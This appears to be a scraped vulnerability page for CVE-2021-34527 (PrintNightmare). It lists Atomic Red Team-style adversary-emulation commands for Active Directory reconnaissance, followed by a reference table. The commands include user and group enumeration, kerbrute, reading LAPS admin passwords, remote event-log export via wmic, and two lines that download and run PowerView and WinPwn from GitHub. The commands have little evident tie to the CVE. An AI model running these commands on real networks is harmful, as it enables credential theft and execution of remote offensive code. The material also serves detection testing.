(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-34527 |
| portal.msrc.microsoft.com |
GitHub CVE
x_refsource_MISC
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34527 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html |
| kb.cert.org |
NVD API
Third Party Advisory
US Government Resource
|
https://www.kb.cert.org/vuls/id/383432 |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/cve-2021-34527-printnightmare-detection-script |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/cve-2021-34527-printnightmare-mitigation-script |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-34527 |